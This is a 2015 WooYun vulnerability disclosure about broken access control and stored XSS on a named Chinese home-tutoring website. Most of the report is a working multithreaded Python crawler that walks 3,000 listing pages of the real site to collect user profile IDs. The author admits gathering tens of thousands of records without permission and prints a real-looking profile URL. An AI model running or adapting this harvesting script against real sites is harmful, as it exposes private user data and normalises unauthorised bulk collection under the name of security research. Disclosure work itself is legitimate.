
Vulnerability Summary (24 followers)

Defect ID: wooyun-2015-0145626

Title: Broken access control + stored XSS on a home-tutoring website

Related vendor: 家教在线

Author: 二愣子

Submitted: 2015-10-11 12:13

Fixed: 2015-11-25 12:14

Disclosed: 2015-11-25 12:14

Vulnerability type: Unauthorized access / permission bypass

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org. For questions or assistance please contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2015-10-11: Actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public
2015-11-25: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Hoping you take that jump
But don't fear the fall

Detailed description:

Broken access control (direct object reference):
http://main.jiajiaozaixian.com/bussinesstudentuserinfo/turnUsercenterStudentUserinfo.action?type=02&idstr=660D52A5075A9768261DA8AA8A879B7A
The idstr parameter maps to a user's ID and can be harvested from the site itself, with no check that the requester owns that profile. I wrote a crawler, collected a few tens of thousands of records, and stopped there.

#! /usr/bin/env python
#coding=utf-8
'''
Author: kevin
Date: 2015/7/13
thread: mul
'''
# Python 2 script: uses BeautifulSoup 3 (attrs as (name, value) tuples), Queue and print statements.
import time
import sys
import requests
import BeautifulSoup
import threading
import Queue

info_list = []  # idstr values collected by all worker threads


def codeSet():
    # Python 2 defaults to the ascii codec; switch to utf-8 so page text can be written out
    if sys.getdefaultencoding() == 'ascii':
        reload(sys)
        sys.setdefaultencoding('utf-8')


def crawl(queue):
    global info_list
    while True:
        if queue.empty():
            break
        url = queue.get()
        headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"}
        try:
            res = requests.get(url, headers=headers, timeout=20)
            res.raise_for_status()
            html = res.text
            soup = BeautifulSoup.BeautifulSoup(html)  # default encoding is already utf-8
            # every listing link opens in a new tab; its first attribute carries the idstr
            dataInfo = soup.findAll(attrs={"target": "_blank"})
            for tag in dataInfo:
                idstr = tag.attrs[0][1]
                info_list.append(idstr + '\r\n')

            sys.stdout.write(threading.current_thread().getName() + "\r\n")
            sys.stdout.flush()
        except Exception as ex:
            print ex
        queue.task_done()
        #time.sleep(1)


def dataSave(info_list):
    # dump the collected idstr values, one per line
    try:
        with open('res.txt', 'w') as f:
            f.writelines(info_list)
    except Exception as err:
        print err


def main():
    print threading.current_thread().getName()
    codeSet()  # default codec is ascii, not unicode
    threads = []
    raw_url = 'http://main.jiajiaozaixian.com/searchGaojiUserinfo.action?pagelimit=no&renyuanSearchType=01&sortContent=&isGoldAsc=&filterContent=&turnPage=Y&direction=&page='
    # fill the queue with one listing URL per page
    for i in xrange(3000):
        print i
        url = raw_url + str(i)
        queue.put(url, block=True, timeout=None)

    # ten worker threads share the queue
    for i in range(10):
        print str(i)
        t = threading.Thread(target=crawl, args=(queue,))
        threads.append(t)

    for t in threads:
        t.start()
    for t in threads:
        t.join()

    dataSave(info_list)

    end_time = time.time()
    print "Elapse time is %s" % (end_time - start_time)


if __name__ == '__main__':
    queue = Queue.Queue(3000)
    start_time = time.time()
    main()


Stored XSS:

(screenshot: 1.png)


Proof of vulnerability:

1. Only a few tens of thousands of records were collected; a sample of the idstr values follows

http://main.jiajiaozaixian.com/bussinesstudentuserinfo/turnUsercenterStudentUserinfo.action?type=02&idstr=660D52A5075A9768261DA8AA8A879B7A


(screenshot: 2.png)


2. XSS

(screenshot: 3.png)


(screenshot: 4.png)

Suggested fix:

You're the experts.

Copyright notice: please credit the source when reposting: 二愣子@乌云


Vulnerability Response

Vendor response:

Vendor could not be contacted, or vendor actively refused